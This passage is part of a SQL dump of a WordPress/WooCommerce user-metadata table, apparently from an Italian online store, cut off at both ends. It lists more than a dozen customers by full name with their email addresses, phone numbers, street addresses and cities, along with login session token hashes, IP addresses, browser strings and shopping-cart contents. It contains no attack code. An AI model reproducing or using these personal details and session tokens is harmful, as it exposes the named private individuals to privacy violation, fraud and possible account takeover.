Safari/602.1\";s:5:\"login\";i:1491596960;}}'),(297,12,'last_update','1491596960'),(298,12,'billing_first_name','Edoardo'),(299,12,'billing_last_name','Zona'),(300,12,'billing_email','Edoardozona@msn.com'),(301,12,'billing_phone','3371083343'),(302,12,'billing_address_1','Via Don Piero Folli 77'),(303,12,'billing_city','Luino'),(304,13,'nickname','Benedetta.maccalli'),(305,13,'first_name','Benedetta'),(306,13,'last_name','Maccalli'),(307,13,'description',''),(308,13,'rich_editing','true'),(309,13,'comment_shortcuts','false'),(310,13,'admin_color','fresh'),(311,13,'use_ssl','0'),(312,13,'show_admin_bar_front','true'),(313,13,'locale',''),(314,13,'wp_capabilities','a:1:{s:8:\"customer\";b:1;}'),(315,13,'wp_user_level','0'),(316,13,'_yoast_wpseo_profile_updated','1492247428'),(317,13,'session_tokens','a:1:{s:64:\"5ba612bc0612713cf10290dfc96e1920a6739e58cecbe8e4437c1a2c9c6149e3\";a:4:{s:10:\"expiration\";i:1493457029;s:2:\"ip\";s:13:\"62.220.90.252\";s:2:\"ua\";s:137:\"Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1\";s:5:\"login\";i:1492247429;}}'),(319,13,'last_update','1492247429'),(320,13,'billing_first_name','Benedetta'),(321,13,'billing_last_name','Maccalli'),(322,13,'billing_email','Benedetta.maccalli@gmail.com'),(323,13,'billing_phone','3346752376'),(324,13,'billing_address_1','Via opifici 50'),(325,13,'billing_city','Gandino'),(328,2,'community-events-location','a:1:{s:2:\"ip\";s:12:\"151.41.196.0\";}'),(329,14,'nickname','leomatrix'),(330,14,'first_name','leonardo'),(331,14,'last_name','matricciani'),(332,14,'description',''),(333,14,'rich_editing','true'),(334,14,'syntax_highlighting','true'),(335,14,'comment_shortcuts','false'),(336,14,'admin_color','fresh'),(337,14,'use_ssl','0'),(338,14,'show_admin_bar_front','true'),(339,14,'locale',''),(340,14,'wp_capabilities','a:1:{s:8:\"customer\";b:1;}'),(341,14,'wp_user_level','0'),(342,14,'_yoast_wpseo_profile_updated','1512288572'),(343,14,'session_tokens','a:1:{s:64:\"372ca06eb4a236b19302cc491c5ac446ee718a257382a44c8881b057e41f973d\";a:4:{s:10:\"expiration\";i:1513498173;s:2:\"ip\";s:11:\"2.34.187.39\";s:2:\"ua\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36\";s:5:\"login\";i:1512288573;}}'),(344,14,'_woocommerce_persistent_cart_1','a:1:{s:4:\"cart\";a:1:{s:32:\"eb163727917cbba1eea208541a643e74\";a:10:{s:3:\"key\";s:32:\"eb163727917cbba1eea208541a643e74\";s:10:\"product_id\";i:211;s:12:\"variation_id\";i:0;s:9:\"variation\";a:0:{}s:8:\"quantity\";i:1;s:13:\"line_tax_data\";a:2:{s:8:\"subtotal\";a:0:{}s:5:\"total\";a:0:{}}s:13:\"line_subtotal\";i:60;s:17:\"line_subtotal_tax\";i:0;s:10:\"line_total\";i:60;s:8:\"line_tax\";i:0;}}}'),(345,14,'last_update','1512288573'),(346,14,'billing_first_name','leonardo'),(347,14,'billing_last_name','matricciani'),(348,14,'billing_address_1','via san mauro 911'),(349,14,'billing_city','cesena'),(350,14,'billing_email','leomatrix@virgilio.it'),(351,14,'billing_phone','+393493133582'),(352,14,'shipping_method',''),(353,15,'nickname','Alessandro.schwarz'),(354,15,'first_name','Alessandro'),(355,15,'last_name','Schwarz'),(356,15,'description',''),(357,15,'rich_editing','true'),(358,15,'syntax_highlighting','true'),(359,15,'comment_shortcuts','false'),(360,15,'admin_color','fresh'),(361,15,'use_ssl','0'),(362,15,'show_admin_bar_front','true'),(363,15,'locale',''),(364,15,'wp_capabilities','a:1:{s:8:\"customer\";b:1;}'),(365,15,'wp_user_level','0'),(366,15,'_yoast_wpseo_profile_updated','1513510309'),(367,15,'session_tokens','a:2:{s:64:\"478f94c4f9191051247a66b78b4d843e608a71ed681ee6aea84a5a4537ce773d\";a:4:{s:10:\"expiration\";i:1514719910;s:2:\"ip\";s:11:\"31.159.61.7\";s:2:\"ua\";s:126:\"Mozilla/5.0 (iPad; CPU OS 10_3_3 like Mac OS X) AppleWebKit/603.3.8 (KHTML, like Gecko) Version/10.0 Mobile/14G60 Safari/602.1\";s:5:\"login\";i:1513510310;}s:64:\"951e2c499bad9e61cf344426bece967cdad102f2272a62fcb88fdc3445b025e9\";a:4:{s:10:\"expiration\";i:1514734639;s:2:\"ip\";s:11:\"2.47.93.247\";s:2:\"ua\";s:136:\"Mozilla/5.0 (iPhone; CPU iPhone OS 11_1_2 like Mac OS X) AppleWebKit/604.3.5 (KHTML, like Gecko) Version/11.0 Mobile/15B202 Safari/604.1\";s:5:\"login\";i:1513525039;}}'),(369,15,'last_update','1513510310'),(370,15,'billing_first_name','Alessandro'),(371,15,'billing_last_name','Schwarz'),(372,15,'billing_address_1','Via s.pertini 32'),(373,15,'billing_city','San Giovanni in persiceto (Bo)'),(374,15,'billing_email','Alessandro.schwarz@errelle.net'),(375,15,'billing_phone','3487475012'),(376,15,'shipping_method',''),(377,15,'_woocommerce_persistent_cart_1','a:1:{s:4:\"cart\";a:0:{}}'),(378,2,'_woocommerce_persistent_cart_1','a:1:{s:4:\"cart\";a:0:{}}'),(379,16,'nickname','stefano.agnoletti'),(380,16,'first_name','stefano'),(381,16,'last_name','agnoletti'),(382,16,'description',''),(383,16,'rich_editing','true'),(384,16,'syntax_highlighting','true'),(385,16,'comment_shortcuts','false'),(386,16,'admin_color','fresh'),(387,16,'use_ssl','0'),(388,16,'show_admin_bar_front','true'),(389,16,'locale',''),(390,16,'wp_capabilities','a:1:{s:8:\"customer\";b:1;}'),(391,16,'wp_user_level','0'),(392,16,'_yoast_wpseo_profile_updated','1513789980'),(393,16,'session_tokens','a:1:{s:64:\"23b7ff047e707855e0dd72db98e8705b6285fe98d455acaa044766dd95a7c184\";a:4:{s:10:\"expiration\";i:1514999581;s:2:\"ip\";s:14:\"159.20.207.242\";s:2:\"ua\";s:131:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36 OPR/49.0.2725.47\";s:5:\"login\";i:1513789981;}}'),(394,16,'_woocommerce_persistent_cart_1','a:1:{s:4:\"cart\";a:1:{s:32:\"eb163727917cbba1eea208541a643e74\";a:10:{s:3:\"key\";s:32:\"eb163727917cbba1eea208541a643e74\";s:10:\"product_id\";i:211;s:12:\"variation_id\";i:0;s:9:\"variation\";a:0:{}s:8:\"quantity\";i:1;s:13:\"line_tax_data\";a:2:{s:8:\"subtotal\";a:0:{}s:5:\"total\";a:0:{}}s:13:\"line_subtotal\";d:60;s:17:\"line_subtotal_tax\";i:0;s:10:\"line_total\";d:60;s:8:\"line_tax\";i:0;}}}'),(395,16,'last_update','1513789981'),(396,16,'billing_first_name','stefano'),(397,16,'billing_last_name','agnoletti'),(398,16,'billing_address_1','case urbini 1 52026 AR'),(399,16,'billing_city','castelfranco piandiscò'),(400,16,'billing_email','stefano.agnoletti@virgilio.it'),(401,16,'billing_phone','3478901159'),(402,16,'shipping_method',''),(403,17,'nickname','Marcocastellani000'),(404,17,'first_name','Marco'),(405,17,'last_name','Castellani'),(406,17,'description',''),(407,17,'rich_editing','true'),(408,17,'syntax_highlighting','true'),(409,17,'comment_shortcuts','false'),(410,17,'admin_color','fresh'),(411,17,'use_ssl','0'),(412,17,'show_admin_bar_front','true'),(413,17,'locale',''),(414,17,'wp_capabilities','a:1:{s:8:\"customer\";b:1;}'),(415,17,'wp_user_level','0'),(416,17,'_yoast_wpseo_profile_updated','1514052447'),(417,17,'session_tokens','a:1:{s:64:\"00df134d2dfae3c0a2f18986fa2635b2a2f7d0334d4b5b2723b2c8ebe894e347\";a:4:{s:10:\"expiration\";i:1515262047;s:2:\"ip\";s:11:\"93.44.98.79\";s:2:\"ua\";s:136:\"Mozilla/5.0 (iPhone; CPU iPhone OS 11_2_1 like Mac OS X) AppleWebKit/604.4.7 (KHTML, like Gecko) Version/11.0 Mobile/15C153 Safari/604.1\";s:5:\"login\";i:1514052447;}}'),(419,17,'last_update','1514052447'),(420,17,'billing_first_name','Marco'),(421,17,'billing_last_name','Castellani'),(422,17,'billing_address_1','Viale Viterbo 6'),(423,17,'billing_city','Riccione'),(424,17,'billing_email','Marcocastellani000@gmail.com'),(425,17,'billing_phone','3482515476'),(426,17,'shipping_method',''),(427,17,'_woocommerce_persistent_cart_1','a:1:{s:4:\"cart\";a:0:{}}'),(428,18,'nickname','itamar.zanotti'),(429,18,'first_name','itamar'),(430,18,'last_name','zanotti'),(431,18,'description',''),(432,18,'rich_editing','true'),(433,18,'syntax_highlighting','true'),(434,18,'comment_shortcuts','false'),(435,18,'admin_color','fresh'),(436,18,'use_ssl','0'),(437,18,'show_admin_bar_front','true'),(438,18,'locale',''),(439,18,'wp_capabilities','a:1:{s:8:\"customer\";b:1;}'),(440,18,'wp_user_level','0'),(441,18,'_yoast_wpseo_profile_updated','1517234474'),(442,18,'session_tokens','a:2:{s:64:\"4f7df16ff6bd2511ea2a620534af8947d605364a27d5acf0a03836fc4edf12fd\";a:4:{s:10:\"expiration\";i:1518444075;s:2:\"ip\";s:13:\"77.242.215.81\";s:2:\"ua\";s:114:\"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36\";s:5:\"login\";i:1517234475;}s:64:\"3c31107d04b54f7d10116f931aa4cc308bcbe8748f8003a6b73d2738f7ca711a\";a:4:{s:10:\"expiration\";i:1517407753;s:2:\"ip\";s:13:\"77.242.215.81\";s:2:\"ua\";s:135:\"Mozilla/5.0 (iPhone; CPU iPhone OS 11_2_5 like Mac OS X) AppleWebKit/604.5.6 (KHTML, like Gecko) Version/11.0 Mobile/15D60 Safari/604.1\";s:5:\"login\";i:1517234953;}}'),(444,18,'last_update','1517234475'),(445,18,'billing_first_name','itamar'),(446,18,'billing_last_name','zanotti'),(447,18,'billing_address_1','via del camerario 64'),(448,18,'billing_city','falciano'),(449,18,'billing_email','itamar.zanotti@icloud.com'),(450,18,'billing_phone','3382803929'),(451,18,'shipping_method',''),(452,18,'_woocommerce_persistent_cart_1','a:1:{s:4:\"cart\";a:0:{}}'),(453,19,'nickname','marcouguccioni98'),(454,19,'first_name','Marco'),(455,19,'last_name','Uguccioni'),(456,19,'description',''),(457,19,'rich_editing','true'),(458,19,'syntax_highlighting','true'),(459,19,'comment_shortcuts','false'),(460,19,'admin_color','fresh'),(461,19,'use_ssl','0'),(462,19,'show_admin_bar_front','true'),(463,19,'locale',''),(464,19,'wp_capabilities','a:1:{s:8:\"customer\";b:1;}'),(465,19,'wp_user_level','0'),(466,19,'_yoast_wpseo_profile_updated','1518381166'),(467,19,'session_tokens','a:1:{s:64:\"2975a56a4dee55914e4b90144bbeee6830884bb8c3a0b834072dd1a31c2f3153\";a:4:{s:10:\"expiration\";i:1519590769;s:2:\"ip\";s:11:\"79.30.38.44\";s:2:\"ua\";s:114:\"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36\";s:5:\"login\";i:1518381169;}}'),(469,19,'last_update','1518381169'),(470,19,'billing_first_name','Marco'),(471,19,'billing_last_name','Uguccioni'),(472,19,'billing_address_1','Via Papiria 85'),(473,19,'billing_city','Fano'),(474,19,'billing_email','marcouguccioni98@gmail.com'),(475,19,'billing_phone','3336160596'),(476,19,'shipping_method',''),(477,19,'_woocommerce_persistent_cart_1','a:1:{s:4:\"cart\";a:0:{}}'),(478,20,'nickname','Marangonimattia'),(479,20,'first_name','Mattia'),(480,20,'last_name','Marangoni'),(481,20,'description',''),(482,20,'rich_editing','true'),(483,20,'syntax_highlighting','true'),(484,20,'comment_shortcuts','false'),(485,20,'admin_color','fresh'),(486,20,'use_ssl','0'),(487,20,'show_admin_bar_front','true'),(488,20,'locale',''),(489,20,'wp_capabilities','a:1:{s:8:\"customer\";b:1;}'),(490,20,'wp_user_level','0'),(491,20,'_yoast_wpseo_profile_updated','1518457789'),(492,20,'session_tokens','a:1:{s:64:\"ae4c9a8fe4fea6c1be6b695afed97f6016550adcfe74d8d8fdc6540262200658\";a:4:{s:10:\"expiration\";i:1519667390;s:2:\"ip\";s:13:\"93.40.208.106\";s:2:\"ua\";s:135:\"Mozilla/5.0 (iPhone; CPU iPhone OS 11_2_5 like Mac OS X) AppleWebKit/604.5.6 (KHTML, like Gecko) Version/11.0 Mobile/15D60 Safari/604.1\";s:5:\"login\";i:1518457790;}}'),(494,20,'last_update','1518457790'),(495,20,'billing_first_name','Mattia'),(496,20,'billing_last_name','Marangoni'),(497,20,'billing_address_1','Ponchielli 20'),(498,20,'billing_city','Riccione'),(499,20,'billing_email','Marangonimattia@me.com'),(500,20,'billing_phone','3920685378'),(501,20,'shipping_method',''),(502,20,'_woocommerce_persistent_cart_1','a:1:{s:4:\"cart\";a:0:{}}'),(503,21,'nickname','virginiadellabalda'),(504,21,'first_name','Virginia'),(505,21,'last_name','Della Balda'),(506,21,'description',''),(507,21,'rich_editing','true'),(508,21,'syntax_highlighting','true'),(509,21,'comment_shortcuts','false'),(510,21,'admin_color','fresh'),(511,21,'use_ssl','0'),(512,21,'show_admin_bar_front','true'),(513,21,'locale',''),(514,21,'wp_capabilities','a:1:{s:8:\"customer\";b:1;}'),(515,21,'wp_user_level','0'),(516,21,'_yoast_wpseo_profile_updated','1518459405'),(517,21,'session_tokens','a:1:{s:64:\"78cfedadec79ebabbbcb1c77493962399ade43e025b8432c2b0fb8b05327bd51\";a:4:{s:10:\"expiration\";i:1519669006;s:2:\"ip\";s:12:\"93.146.77.45\";s:2:\"ua\";s:136:\"Mozilla/5.0 (iPhone; CPU iPhone OS 11_2_1 like Mac OS X) AppleWebKit/604.4.7 (KHTML, like Gecko) Version/11.0 Mobile/15C153 Safari/604.1\";s:5:\"login\";i:1518459406;}}'),(519,21,'last_update','1518459569'),(520,21,'billing_first_name','Virginia'),(521,21,'billing_last_name','Della Balda'),(522,21,'billing_address_1','Via Raffaele Adimari 4'),(523,21,'billing_city','Rimini'),(524,21,'billing_email','virginiadellabalda@me.com'),(525,21,'billing_phone','3331432560'),(527,21,'shipping_method',''),(528,22,'nickname','l.piermarini'),(529,22,'first_name','Piermarini'),(530,22,'last_name','Piermarini'),(531,22,'description',''),(532,22,'rich_editing','true'),(533,22,'syntax_highlighting','true'),(534,22,'comment_shortcuts','false'),(535,22,'admin_color','fresh'),(536,22,'use_ssl','0'),(537,22,'show_admin_bar_front','true'),(538,22,'locale',''),(539,22,'wp_capabilities','a:1:{s:8:\"customer\";b:1;}'),(540,22,'wp_user_level','0'),(541,22,'_yoast_wpseo_profile_updated','1518620695'),(542,22,'session_tokens','a:1:{s:64:\"8f8c1cd2f991464275dc775d2f812cd59444377649731ea4b760afdf9088b276\";a:4:{s:10:\"expiration\";i:1519830296;s:2:\"ip\";s:13:\"79.11.190.171\";s:2:\"ua\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36\";s:5:\"login\";i:1518620696;}}'),(544,22,'last_update','1518620791'),(545,22,'billing_first_name','Piermarini'),(546,22,'billing_last_name','Piermarini'),(547,22,'billing_address_1','Viale San Martino 90'),(548,22,'billing_city','Riccione'),(549,22,'billing_email','l.piermarini@yahoo.com'),(550,22,'billing_phone','3402795458'),(552,22,'shipping_method',''),(553,22,'_woocommerce_persistent_cart_1','a:1:{s:4:\"cart\";a:0:{}}'),(554,1,'edit_product_per_page','40'),(555,23,'nickname','andrea.mennini'),(556,23,'first_name','Andrea'),(557,23,'last_name','Mennini'),(558,23,'description',''),(559,23,'rich_editing','true'),(560,23,'syntax_highlighting','true'),(561,23,'comment_shortcuts','false'),(562,23,'admin_color','fresh'),(563,23,'use_ssl','0'),(564,23,'show_admin_bar_front','true'),(565,23,'locale',''),(566,23,'wp_capabilities','a:1:{s:8:\"customer\";b:1;}'),(567,23,'wp_user_level','0'),(568,23,'_yoast_wpseo_profile_updated','1520682030'),(569,23,'session_tokens','a:2:{s:64:\"5f9267629fecfd13cc2e0fe6412305db9ee6d8aabe696e51afc769fb9e31c198\";a:4:{s:10:\"expiration\";i:1554729148;s:2:\"ip\";s:11:\"79.53.43.81\";s:2:\"ua\";s:77:\"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0\";s:5:\"login\";i:1554556348;}s:64:\"7a876c742abc174842029bae0dce81722b654f3432c220a3111e6a202c309c59\";a:4:{s:10:\"expiration\";i:1554729299;s:2:\"ip\";s:11:\"79.53.43.81\";s:2:\"ua\";s:113:\"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36\";s:5:\"login\";i:1554556499;}}'),(570,23,'_woocommerce_persistent_cart_1','a:1:{s:4:\"cart\";a:3:{s:32:\"b83aac23b9528732c23cc7352950e880\";a:10:{s:3:\"key\";s:32:\"b83aac23b9528732c23cc7352950e880\";s:10:\"product_id\";i:327;s:12:\"variation_id\";i:0;s:9:\"variation\";a:0:{}s:8:\"quantity\";i:1;s:13:\"line_tax_data\";a:2:{s:8:\"subtotal\";a:0:{}s:5:\"total\";a:0:{}}s:13:\"line_subtotal\";d:60;s:17:\"line_subtotal_tax\";i:0;s:10:\"line_total\";d:60;s:8:\"line_tax\";i:0;}s:32:\"5737c6ec2e0716f3d8a7a5c4e0de0d9a\";a:10:{s:3:\"key\";s:32:\"5737c6ec2e0716f3d8a7a5c4e0de0d9a\";s:10:\"product_id\";i:322;s:12:\"variation_id\";i:0;s:9:\"variation\";a:0:{}s:8:\"quantity\";i:1;s:13:\"line_tax_data\";a:2:{s:8:\"subtotal\";a:0:{}s:5:\"total\";a:0:{}}s:13:\"line_subtotal\";d:60;s:17:\"line_subtotal_tax\";i:0;s:10:\"line_total\";d:60;s:8:\"line_tax\";i:0;}s:32:\"89f0fd5c927d466d6ec9a21b9ac34ffa\";a:11:{s:3:\"key\";s:32:\"89f0fd5c927d466d6ec9a21b9ac34ffa\";s:10:\"product_id\";i:325;s:12:\"variation_id\";i:0;s:9:\"variation\";a:0:{}s:8:\"quantity\";i:1;s:9:\"data_hash\";s:32:\"b5c1d5ca8bae6d4896cf1807cdf763f0\";s:13:\"line_tax_data\";a:2:{s:8:\"subtotal\";a:0:{}s:5:\"total\";a:0:{}}s:13:\"line_subtotal\";d:150;s:17:\"line_subtotal_tax\";i:0;s:10:\"line_total\";d:150;s:8:\"line_tax\";i:0;}}}'),(571,23,'last_update','1520682031'),(572,23,'billing_first_name','Andrea'),(573,23,'billing_last_name','Mennini'),(574,23,'billing_address_1','Via Giustiniano Grosoli 2'),(575,23,'billing_city','Carpi'),(576,23,'billing_email','andrea.mennini@gmail.com'),(577,23,'billing_phone','335222030'),(578,23,'shipping_method',''),(579,24,'nickname','danielataroni'),(580,24,'first_name','Daniela'),(581,24,'last_name','Taroni'),(582,24,'description',''),(583,24,'rich_editing','true'),(584,24,'syntax_highlighting','true'),(585,24,'comment_shortcuts','false'),(586,24,'admin_color','fresh'),(587,24,'use_ssl','0'),(588,24,'show_admin_bar_front','true'),(589,24,'locale',''),(590,24,'wp_capabilities','a:1:{s:8:\"customer\";b:1;}'),(591,24,'wp_user_level','0'),(592,24,'_yoast_wpseo_profile_updated','1520861197'),(593,24,'session_tokens','a:1:{s:64:\"0402ec436ae819591b3122eb0e8d07c4e5a439faca6df5b96580f485c0187f14\";a:4:{s:10:\"expiration\";i:1522070797;s:2:\"ip\";s:12:\"151.42.0.222\";s:2:\"ua\";s:136:\"Mozilla/5.0 (iPhone; CPU iPhone OS 11_2_6 like Mac OS X) AppleWebKit/604.5.6 (KHTML, like Gecko) Version/11.0 Mobile/15D100 Safari/604.1\";s:5:\"login\";i:1520861197;}}'),(595,24,'last_update','1520861197'),(596,24,'billing_first_name','Daniela'),(597,24,'billing_last_name','Taroni'),(598,24,'billing_address_1','Via Dalla Chiesa 40/e'),(599,24,'billing_city','Castel San Pietro terme'),(600,24,'billing_email','danielataroni@libero.it'),(601,24,'billing_phone','3393834281'),(602,24,'shipping_method',''),(603,24,'_woocommerce_persistent_cart_1','a:1:{s:4:\"cart\";a:0:{}}'),(604,25,'nickname','ale.canevari'),(605,25,'first_name','Canevari Alessandro'),(606,25,'last_name','Canevari'),(607,25,'description',''),(608,25,'rich_editing','true'),(609,25,'syntax_highlighting','true'),(610,25,'comment_shortcuts','false'),(611,25,'admin_color','fresh'),(612,25,'use_ssl','0'),(613,25,'show_admin_bar_front','true'),(614,25,'locale',''),(615,25,'wp_capabilities','a:1:{s:8:\"customer\";b:1;}'),(616,25,'wp_user_level','0'),(617,25,'_yoast_wpseo_profile_updated','1521040825'),(618,25,'session_tokens','a:1:{s:64:\"2f73371b8bb521a364aa8b2e6f2c1a88b4fc8456662513d1bdebd73b0561d53a\";a:4:{s:10:\"expiration\";i:1522250426;s:2:\"ip\";s:13:\"62.196.58.194\";s:2:\"ua\";s:114:\"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36\";s:5:\"login\";i:1521040826;}}'),(619,25,'_woocommerce_persistent_cart_1','a:1:{s:4:\"cart\";a:1:{s:32:\"5737c6ec2e0716f3d8a7a5c4e0de0d9a\";a:10:{s:3:\"key\";s:32:\"5737c6ec2e0716f3d8a7a5c4e0de0d9a\";s:10:\"product_id\";i:322;s:12:\"variation_id\";i:0;s:9:\"variation\";a:0:{}s:8:\"quantity\";i:1;s:13:\"line_tax_data\";a:2:{s:8:\"subtotal\";a:0:{}s:5:\"total\";a:0:{}}s:13:\"line_subtotal\";d:50;s:17:\"line_subtotal_tax\";i:0;s:10:\"line_total\";d:50;s:8:\"line_tax\";i:0;}}}'),(620,25,'last_update','1521040826'),(621,25,'billing_first_name','Canevari Alessandro'),(622,25,'billing_last_name','Canevari'),(623,25,'billing_address_1','Via Cabrini 43'),(624,25,'billing_city','maleo'),(625,25,'billing_email','ale.canevari@hotmail.it'),(626,25,'billing_phone','3392905201'),(627,25,'shipping_method',''),(628,26,'nickname','Martinamazzucchelli'),(629,26,'first_name','Martina'),(630,26,'last_name','Mazzucchelli'),(631,26,'description',''),(632,26,'rich_editing','true'),(633,26,'syntax_highlighting','true'),(634,26,'comment_shortcuts','false'),(635,26,'admin_color','fresh'),(636,26,'use_ssl','0'),(637,26,'show_admin_bar_front','true'),(638,26,'locale',''),(639,26,'wp_capabilities','a:1:{s:8:\"customer\";b:1;}'),(640,26,'wp_user_level','0'),(641,26,'_yoast_wpseo_profile_updated','1521822950'),(642,26,'session_tokens','a:1:{s:64:\"e283180a93feca7908812c09eea0a6f27d4d68918e5e57cff2ce37259f083e31\";a:4:{s:10:\"expiration\";i:1523032551;s:2:\"ip\";s:13:\"151.82.146.56\";s:2:\"ua\";s:136:\"Mozilla/5.0 (iPhone; CPU iPhone OS 11_2_6 like Mac OS X) AppleWebKit/604.5.6 (KHTML, like Gecko) Version/11.0 Mobile/15D100 Safari/604.1\";s:5:\"login\";i:1521822951;}}'),(643,26,'_woocommerce_persistent_cart_1','a:1:{s:4:\"cart\";a:1:{s:32:\"5737c6ec2e0716f3d8a7a5c4e0de0d9a\";a:10:{s:3:\"key\";s:32:\"5737c6ec2e0716f3d8a7a5c4e0de0d9a\";s:10:\"product_id\";i:322;s:12:\"variation_id\";i:0;s:9:\"variation\";a:0:{}s:8:\"quantity\";i:1;s:13:\"line_tax_data\";a:2:{s:8:\"subtotal\";a:0:{}s:5:\"total\";a:0:{}}s:13:\"line_subtotal\";d:50;s:17:\"line_subtotal_tax\";i:0;s:10:\"line_total\";d:50;s:8:\"line_tax\";i:0;}}}'),(644,26,'last_update','1521822951'),(645,26,'billing_first_name','Martina'),(646,26,'billing_last_name','Mazzucchelli'),(647,26,'billing_address_1','Via fornaci'),(648,26,'billing_city','Carpi'),(649,26,'billing_email','Martinamazzucchelli@gmail.com'),(650,26,'billing_phone','3459637240'),(651,26,'shipping_method',''),(652,27,'nickname','mventuri'),(653,27,'first_name','matteo'),(654,27,'last_name','venturi'),(655,27,'description',''),(656,27,'rich_editing','true'),(657,27,'syntax_highlighting','true'),(658,27,'comment_shortcuts','false'),(659,27,'admin_color','fresh'),(660,27,'use_ssl','0'),(661,27,'show_admin_bar_front','true'),(662,27,'locale',''),(663,27,'wp_capabilities','a:1:{s:8:\"customer\";b:1;}'),(664,27,'wp_user_level','0'),(665,27,'_yoast_wpseo_profile_updated','1522076618'),(666,27,'session_tokens','a:1:{s:64:\"3abfc0133ae8e0f0b5dec33c692b190cb2a2e5202b9e053ef45ff1dc075f3fae\";a:4:{s:10:\"expiration\";i:1523286219;s:2:\"ip\";s:12:\"188.9.204.74\";s:2:\"ua\";s:78:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0\";s:5:\"login\";i:1522076619;}}'),(667,27,'_woocommerce_persistent_cart_1','a:1:{s:4:\"cart\";a:1:{s:32:\"b83aac23b9528732c23cc7352950e880\";a:10:{s:3:\"key\";s:32:\"b83aac23b9528732c23cc7352950e880\";s:10:\"product_id\";i:327;s:12:\"variation_id\";i:0;s:9:\"variation\";a:0:{}s:8:\"quantity\";i:1;s:13:\"line_tax_data\";a:2:{s:8:\"subtotal\";a:0:{}s:5:\"total\";a:0:{}}s:13:\"line_subtotal\";d:50;s:17:\"line_subtotal_tax\";i:0;s:10:\"line_total\";d:50;s:8:\"line_tax\";i:0;}}}'),(668,27,'last_update','1522077100'),(669,27,'billing_first_name','matteo'),(670,27,'billing_last_name','venturi'),(671,27,'billing_address_1','viale armando diaz 7'),(672,27,'billing_city','sansepolcro'),(673,27,'billing_email','mventuri@me.com'),(674,27,'billing_phone','3356172357'),(676,27,'shipping_method',''),(677,28,'nickname','davolifabio75'),(678,28,'first_name','FABIO'),(679,28,'last_name','DAVOLI'),(680,28,'description',''),(681,28,'rich_editing','true'),(682,28,'syntax_highlighting','true'),(683,28,'comment_shortcuts','false'),(684,28,'admin_color','fresh'),(685,28,'use_ssl','0'),(686,28,'show_admin_bar_front','true'),(687,28,'locale',''),(688,28,'wp_capabilities','a:1:{s:8:\"customer\";b:1;}'),(689,28,'wp_user_level','0'),(690,28,'_yoast_wpseo_profile_updated','1522273549'),(691,28,'session_tokens','a:1:{s:64:\"19cb4de8670fd587f1f32043e0769de9ba9ec094ba078dbd409967f7305d5c4d\";a:4:{s:10:\"expiration\";i:1523483149;s:2:\"ip\";s:12:\"31.156.183.5\";s:2:\"ua\";s:102:\"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36\";s:5:\"login\";i:1522273549;}}'),(692,28,'_woocommerce_persistent_cart_1','a:1:{s:4:\"cart\";a:1:{s:32:\"6faa8040da20ef399b63a72d0e4ab575\";a:10:{s:3:\"key\";s:32:\"6faa8040da20ef399b63a72d0e4ab575\";s:10:\"product_id\";i:329;s:12:\"variation_id\";i:0;s:9:\"variation\";a:0:{}s:8:\"quantity\";i:1;s:13:\"line_tax_data\";a:2:{s:8:\"subtotal\";a:0:{}s:5:\"total\";a:0:{}}s:13:\"line_subtotal\";d:100;s:17:\"line_subtotal_tax\";i:0;s:10:\"line_total\";d:100;s:8:\"line_tax\";i:0;}}}'),(693,28,'last_update','1522273549'),(694,28,'billing_first_name','FABIO'),(695,28,'billing_last_name','DAVOLI'),(696,28,'billing_address_1','Via Vaglie n.15'),(697,28,'billing_city','ALBINEA'),(698,28,'billing_email','davolifabio75@gmail.com'),(699,28,'billing_phone','3472522686'),(700,28,'shipping_method',''),(701,29,'nickname','MerighiGiorgia'),(702,29,'first_name','Giorgia'),(703,29,'last_name','Merighi'),(704,29,'description',''),(705,29,'rich_editing','true'),(706,29,'syntax_highlighting','true'),(707,29,'comment_shortcuts','false'),(708,29,'admin_color','fresh'),(709,29,'use_ssl','0'),(710,29,'show_admin_bar_front','true'),(711,29,'locale',''),(712,29,'wp_capabilities','a:1:{s:8:\"customer\";b:1;}'),(713,29,'wp_user_level','0'),(714,29,'_yoast_wpseo_profile_updated','1522323045'),(715,29,'session_tokens','a:1:{s:64:\"10afab60b0ea15d36d36dff6e03ed43e16255bba228de91f93b48d2c5d91cf68\";a:4:{s:10:\"expiration\";i:1523532647;s:2:\"ip\";s:14:\"158.148.94.226\";s:2:\"ua\";s:136:\"Mozilla/5.0 (iPhone; CPU iPhone OS 11_2_1 like Mac OS X) AppleWebKit/604.4.7 (KHTML, like Gecko) Version/11.0 Mobile/15C153 